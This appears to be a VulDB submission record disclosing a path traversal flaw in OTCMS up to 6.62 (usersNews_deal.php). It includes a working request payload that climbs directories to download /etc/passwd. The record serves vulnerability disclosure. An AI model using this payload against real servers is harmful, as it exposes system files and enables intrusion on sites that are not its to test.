| Title | OTCMS was discovered to contain an arbitrary file download vulenrability via the filename |
|---|
| Description | OTCMS was discovered to contain an arbitrary file download vulenrability via the filename.
payload
file=../../../../../../../../../../../../../etc/passwd&isRenameFile=1&fileName=1.php
Then it can be downloaded in the foreground to read the passwd file. |
|---|
| Source | ⚠️ https://github.com/HuBenLab/HuBenVulList/blob/main/OTCMS%20was%20discovered%20to%20contain%20an%20arbitrary%20file%20download%20vulenrability%20via%20the%20filename.md |
|---|
| User | p0ison (UID 37575) |
|---|
| Submission | 06/06/2023 08:45 (3 years ago) |
|---|
| Moderation | 06/14/2023 08:13 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 231511 [OTCMS up to 6.62 usersNews_deal.php File path traversal] |
|---|
| Points | 17 |
|---|